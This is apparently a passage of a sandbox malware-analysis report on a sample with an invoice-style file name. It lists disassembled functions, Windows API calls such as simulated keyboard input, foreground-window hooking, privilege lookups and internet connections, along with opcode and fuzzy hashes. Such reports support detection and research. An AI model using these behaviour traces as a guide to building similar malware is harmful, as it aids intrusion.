                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E78B4D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E7AE1A
                                          • GetWindowRect.USER32(?,?), ref: 00E7AE90
                                          • PtInRect.USER32(?,?,00E7C304), ref: 00E7AEA0
                                          • MessageBeep.USER32(00000000), ref: 00E7AF11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E51037
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E51053
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E510B9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E5110B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          APIs
                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E51176
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E51192
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E511F1
                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E51243
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E2644B
                                          • __isleadbyte_l.LIBCMT ref: 00E26479
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E264A7
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E264DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 78deba1e27513661ba4d687f20c4ed55dbdfc29b985a2c7170baa640a3d1a26c
                                          • Instruction ID: 948a85215800ca5a05dc88d804d504e9ed59eea4e2e143ee1a2a53489047d179
                                          • Opcode Fuzzy Hash: 78deba1e27513661ba4d687f20c4ed55dbdfc29b985a2c7170baa640a3d1a26c
                                          • Instruction Fuzzy Hash: 78310430600266EFDB21AF75D844BBA7BE5FF00314F155229E8B4A71A1D731D890CB90
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E75189
                                            • Part of subcall function 00E5387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E53897
                                            • Part of subcall function 00E5387D: GetCurrentThreadId.KERNEL32 ref: 00E5389E
                                            • Part of subcall function 00E5387D: AttachThreadInput.USER32(00000000,?,00E552A7), ref: 00E538A5
                                          • GetCaretPos.USER32(?), ref: 00E7519A
                                          • ClientToScreen.USER32(00000000,?), ref: 00E751D5
                                          • GetForegroundWindow.USER32 ref: 00E751DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 025dce7a12799c52407b6605e0b12867a3e86f049dc13c01cfb2ee77c91aa3c2
                                          • Instruction ID: beec4a3e02863b0dff5a0ae6770959fa97cc6989b9188355286b977c4d202d6a
                                          • Opcode Fuzzy Hash: 025dce7a12799c52407b6605e0b12867a3e86f049dc13c01cfb2ee77c91aa3c2
                                          • Instruction Fuzzy Hash: D9311C71D00108AFDB04EFA5C845AEFF7F9EF98300B11806AE915E7241EA759E45CBA0
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetCursorPos.USER32(?), ref: 00E7C7C2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E2BBFB,?,?,?,?,?), ref: 00E7C7D7
                                          • GetCursorPos.USER32(?), ref: 00E7C824
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E2BBFB,?,?,?), ref: 00E7C85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 22889219b1ab49142235f4ac9ae781fb990fc2cf3b85f8d044c17826fba31c21
                                          • Instruction ID: 65b65d22a4405bf2254606d163935a491746050068a2c136a1d20c3ddbdee3b8
                                          • Opcode Fuzzy Hash: 22889219b1ab49142235f4ac9ae781fb990fc2cf3b85f8d044c17826fba31c21
                                          • Instruction Fuzzy Hash: E831E435600018AFDB19CF59C898EFA7BBAEB09310F148169F909AB261C731AE51DF61
                                          APIs
                                          • __setmode.LIBCMT ref: 00E10BF2
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E57B20,?,?,00000000), ref: 00DF5B8C
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E57B20,?,?,00000000,?,?), ref: 00DF5BB0
                                          • _fprintf.LIBCMT ref: 00E10C29
                                          • OutputDebugStringW.KERNEL32(?), ref: 00E46331
                                            • Part of subcall function 00E14CDA: _flsall.LIBCMT ref: 00E14CF3
                                          • __setmode.LIBCMT ref: 00E10C5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 0f5a62a18f96bba368df3a87a0595318ce0dcaf88da147ab44eb709d29093ded
                                          • Instruction ID: 5c6daddad412ef9fc5c10d1e9d834f0274e40c994161dae1c9e7451199d70430
                                          • Opcode Fuzzy Hash: 0f5a62a18f96bba368df3a87a0595318ce0dcaf88da147ab44eb709d29093ded
                                          • Instruction Fuzzy Hash: C7110AB19042087EDB04B7B4AC439FEBBA9DF85320F14615AF208772D2DE615DC68BE5
                                          APIs
                                            • Part of subcall function 00E48652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E48669
                                            • Part of subcall function 00E48652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E48673
                                            • Part of subcall function 00E48652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48682
                                            • Part of subcall function 00E48652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48689
                                            • Part of subcall function 00E48652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E4869F
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E48BEB
                                          • _memcmp.LIBCMT ref: 00E48C0E
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E48C44
                                          • HeapFree.KERNEL32(00000000), ref: 00E48C4B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 469991a2a2b3346d49d1950aad0d296307a1e3a671cd7e665293e0d8488340d8
                                          • Instruction ID: d7547712d95a55f013c121e41ff5651195597b6251eb1d28497439d841cc892a
                                          • Opcode Fuzzy Hash: 469991a2a2b3346d49d1950aad0d296307a1e3a671cd7e665293e0d8488340d8
                                          • Instruction Fuzzy Hash: F7218971E02208AFCB00CFA4DA84BEEB7B8EF50348F044099E458B7240DB31AA46CB61
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E61A97
                                            • Part of subcall function 00E61B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E61B40
                                            • Part of subcall function 00E61B21: InternetCloseHandle.WININET(00000000), ref: 00E61BDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: dbf4ac94316f6d7f5457ec1d6a2dd1a7d9c6854edd82ddb6d1e5c0f984949e33
                                          • Instruction ID: b565625cb867f3c2b36936864ec16906deb3850f127dee8959624890e60e3cf1
                                          • Opcode Fuzzy Hash: dbf4ac94316f6d7f5457ec1d6a2dd1a7d9c6854edd82ddb6d1e5c0f984949e33
                                          • Instruction Fuzzy Hash: 4121D435280601BFDB169F60EC05FBABBADFF44781F18101EFA15A6550E731E8149B90
                                          APIs
                                            • Part of subcall function 00E4F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E4E1C4,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?), ref: 00E4F5BC
                                            • Part of subcall function 00E4F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E4F5E2
                                            • Part of subcall function 00E4F5AD: lstrcmpiW.KERNEL32(00000000,?,00E4E1C4,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?), ref: 00E4F613
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E4E1DD
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00E4E203
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E4EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E4E237
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: bf817edd4ae59eae4d1fb2c7dea9a94ebbed8069f159a1f2b34d27d3e8591f8f
                                          • Instruction ID: ee9e50414090583b39823e013c5f09f265695781833c1a08b7344956fbcd5ec3
                                          • Opcode Fuzzy Hash: bf817edd4ae59eae4d1fb2c7dea9a94ebbed8069f159a1f2b34d27d3e8591f8f
                                          • Instruction Fuzzy Hash: 7011D036200301EFCB25AF74EC45D7A77A8FF89350B40502AF806DB260EBB1A891D7A4
                                          APIs
                                          • _free.LIBCMT ref: 00E25351
                                            • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: c971f92c3def18a228d13f201f992c9ed601af7c2e8de7aeadc6612edfee8f51
                                          • Instruction ID: 4220e02e864907e2bcd67f4bc480002ebf73a76df914d84a7ec4b885a3a44e7f
                                          • Opcode Fuzzy Hash: c971f92c3def18a228d13f201f992c9ed601af7c2e8de7aeadc6612edfee8f51
                                          • Instruction Fuzzy Hash: CC11E373504B25AFCF21AF70BE456EE37D89F143A4F20352AF949BA191DE7189818790
                                          APIs
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E57B20,?,?,00000000), ref: 00DF5B8C
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E57B20,?,?,00000000,?,?), ref: 00DF5BB0
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00E666AC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E666B7
                                          • _memmove.LIBCMT ref: 00E666E4
                                          • inet_ntoa.WSOCK32(?), ref: 00E666EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: dcf3593acac420f22bc55f2dd8e59af2df8d28a0f5809a2a89cf553d3af58cc0
                                          • Instruction ID: 975c5673264172e854fda73f0e56f46091528429f2393e6044451f3715108037
                                          • Opcode Fuzzy Hash: dcf3593acac420f22bc55f2dd8e59af2df8d28a0f5809a2a89cf553d3af58cc0
                                          • Instruction Fuzzy Hash: 80119035900508AFCB04EBA0ED96DEEB7B8EF04310B158065F606B7161DF30AE44CB71
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E49043
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E49055
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E4906B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E49086
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: d9b9c47c3193ba8015ec34fa52e40414f912aa55554d19c144c26799bd2bf5f2
                                          • Instruction ID: d1100ddfd8b9f1d794b9b8311f8389e617987ff7add2c77fdf4378a4f66c41a5
                                          • Opcode Fuzzy Hash: d9b9c47c3193ba8015ec34fa52e40414f912aa55554d19c144c26799bd2bf5f2
                                          • Instruction Fuzzy Hash: 99115E79900218FFDB10DFA5CC84E9EBBB4FB48710F204095E904B7290D6716E50DB90
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00DF12D8
                                          • GetClientRect.USER32(?,?), ref: 00E2B84B
                                          • GetCursorPos.USER32(?), ref: 00E2B855
                                          • ScreenToClient.USER32(?,?), ref: 00E2B860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 86db477f00d7cd03b165966853417f6374224020c23c2019dc7da666213b3aed
                                          • Instruction ID: 3752cb4e1e59ca604e1c677db3c662806e4b9bb43678a66db1cd1a365d68693d
                                          • Opcode Fuzzy Hash: 86db477f00d7cd03b165966853417f6374224020c23c2019dc7da666213b3aed
                                          • Instruction Fuzzy Hash: 7E11283990011DEFCB04EFA4D8869FE77B8FB05310F018466FA45E7250C730AA958BB9
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E5166F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E51694
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E5169E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E516D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 6eb2c4395dc2278f744faef80102ac17b3650c0029f6b050504b5b42292d4cef
                                          • Instruction ID: e264b0ce00d21bbc561779811a99cf39939c8378fb2d8f7f805fddcb2b627c60
                                          • Opcode Fuzzy Hash: 6eb2c4395dc2278f744faef80102ac17b3650c0029f6b050504b5b42292d4cef
                                          • Instruction Fuzzy Hash: C7114831C01518EBCF00AFA6D848BEEBB78FF09752F444495ED44B2240CBB055A8CBA6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
